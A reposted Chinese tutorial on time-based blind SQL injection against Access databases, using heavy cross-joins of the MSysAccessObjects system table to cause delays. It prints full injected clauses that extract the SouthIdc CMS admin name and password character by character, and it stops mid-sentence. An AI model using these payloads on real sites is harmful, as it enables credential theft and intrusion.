Acce、ss數據庫基于時間sql盲注的實現記錄

2019-11-02 15:25:54

字體：大中小

來源：轉載

供稿：網友

　　Access是微軟把數據庫引擎的圖形用戶界面和php?/%C8%ED%BC%FE%BF%AA%B7%A2%B9%A4' target='_blank'>軟件開發工具結合在一起的一個數據庫管理系統。本文我們來看看Access數據庫基于時間sql盲注的實現記錄。

　　概述

　　眾所周知，access數據庫是不支持基于時間的盲注方式，但是我們可以利用access的系統表MSysAccessObjects，通過多負荷查詢(Heavy Queries)的方式實現。

　　初步探究

　　我們以SouthIdcv17數據庫為例

　　執行 select * from Southidc_About ，返回結果如下圖。

　　如何實現time base injection 呢?我們就要利用這條語句

　　SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

　　具體實現方式如下：

　　select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

　　Southidc_Admin)=97

　　我們可以執行一次，觀察效果。

　　很明顯，經歷了大約40s才返回結果

　　當我們執行如下語句時,也就是把最后的97改為96

　　Southidc_Admin)=96

　　很快就執行完畢，沒有延時。

　　很明顯，我們通過where條件后的

　　(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

　　實現了延時，但需要注意的是這里where后的條件是有順序的，實現延時的語句必須在

　　1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

上一篇：錯誤和-數據庫事件觸發

下一篇：數據庫設、計范式